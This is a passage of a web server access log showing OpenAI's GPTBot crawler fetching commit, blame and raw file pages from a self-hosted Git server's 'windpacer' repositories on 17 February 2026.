"https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" +[17/Feb/2026:15:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11906] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts" +[17/Feb/2026:15:08:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11908] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts" +[17/Feb/2026:15:09:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11213] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:09:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11189] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:09:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11214] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:09:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11214] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:09:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11211] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 211027] [Gzip 18.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:15:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 211030] [Gzip 18.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:15:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 296388] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:15:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 211046] [Gzip 18.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:15:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 211029] [Gzip 18.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:15:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/Dockerfile?display=source" [Client 74.7.227.38] [Length 11590] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/Dockerfile" +[17/Feb/2026:15:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9956] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9931] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9955] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9953] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9954] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:09:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 10221] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:15:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 322705] [Gzip 27.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:15:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=rendered" [Client 74.7.227.38] [Length 11015] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:15:09:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 10220] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:15:09:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10180] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:09:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 10219] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:15:09:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10157] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:09:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10180] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:09:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10179] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:09:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10181] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 322702] [Gzip 27.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:15:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 322701] [Gzip 27.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:15:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 305108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:15:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 305108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:15:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 305108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:15:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fjs" [Client 74.7.227.38] [Length 43400] [Gzip 8.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js" +[17/Feb/2026:15:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10416] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm" +[17/Feb/2026:15:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10416] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm" +[17/Feb/2026:15:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10413] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm" +[17/Feb/2026:15:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10383] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm" +[17/Feb/2026:15:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11279] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json" +[17/Feb/2026:15:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json?display=source" [Client 74.7.227.38] [Length 11045] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json" +[17/Feb/2026:15:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json" +[17/Feb/2026:15:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11278] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json" +[17/Feb/2026:15:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json" +[17/Feb/2026:15:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 